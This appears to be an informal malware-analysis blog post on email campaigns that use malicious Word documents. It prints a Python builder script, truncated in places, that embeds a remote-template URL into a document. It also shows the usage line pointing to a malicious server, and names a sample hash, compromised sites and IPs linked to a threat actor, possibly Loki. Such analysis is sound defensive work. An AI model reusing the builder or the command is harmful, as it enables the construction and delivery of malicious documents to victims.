Here is a quick after_dinner_blog_post about multiple offensive campaigns delivered via email with a malicious document in attach. All the malicious documents used in the attacks are built using a Python script named Prothemus1:
from random import * import base64 import sys import struct import binascii URL = binascii.b2a_hex(sys.argv) PSP = '00'.join([URL[i:i+2] for i in range(0, len(URL), 2)]) P1 = ("7B5C727442FF5C616465666C616E67313032355C616E73695C616E7369637067313235325C7563" "315C616465666633313530375C64656666305C73747368666462636833313530365C7374736866" --------------- CUT CUT CUT --------------- "35333733313332333530303030303030303030343030313030303065306339656137090D39090D" "66090D39090D62090D61090D63090D65090D31090D31090D38090D63090D3832090D30090D3009" "0D61090D61090D30090D30090D34090D62090D61090D39090D30090D62090D3238303130303030") P2 =("303030303030303030303030303030303030303030303030303030303030303030303030303030" "303030303030303030303030303030303030303030303030303030303030303030303030303030" "303030303030303030303030303030303030303030303030303030303030303030303030303030" --------------- CUT CUT CUT --------------- "303030300D0A303030303030303030303030303030303030303030303030303030303030303030" "303030303030303030303030303030303130353030303030303030303030307D7D") part1 = bytearray(binascii.unhexlify(P1)) part2 = bytearray(binascii.unhexlify(P2)) padd = "\x30" *(134-len(PSP)) if len(PSP+padd) > 134 : print ("[+] Error: Please make your URL smaller") exit(0) print "Usage: " + sys.argv + " URL of Template" + " Output.doc" file = sys.argv f = open(file,mode='wb') f.write(part1+PSP+padd+part2) print ("[+] Done")
The script is really simple, it takes two parameters: the url of a remote file and the name of the document to be created. To see the script used in a real scenario take a look at DUBAI_EMQUIRY.doc (SHA256: d7b759f762b6f0761ecd0bf959babc712e069dbdb58585ed83bc5232f1b45d69). The file has been created using the Prothemus1 script in this way:
prothemus1.py HTTP:\\126.96.36.199\ap\121.doc DUBAI_EMQUIRY.doc
188.8.131.52 is not the only server storing malicious documents/payloads, 184.108.40.206 is another one used by the same Threat Actor. Most of the visible folders inside the two servers contain the same two files:
121.doc is the unique name used for every downloaded document I have seen so far. The new file makes use of VBscript:
Two files are downloaded from a compromised website, the real exe payload and a decoy document.
Among all the compromised sites I have seen so far amarinradio.com, toboreklab.com and rawmediatek.com, the last one has an open folder.
I haven’t checked every single payload I have and I can’t be sure about the threats behind this whole system but as far as I have seen I think it’s almost all related to Loki (I repeat, I could be wrong..). Here are few of the contacted hosts by the final exe payload:
This blog post is far from being complete, I have no time to end it with all the necessary information. However, if you needs some more infos because you want to dig in I’ll be happy to share as much as I can.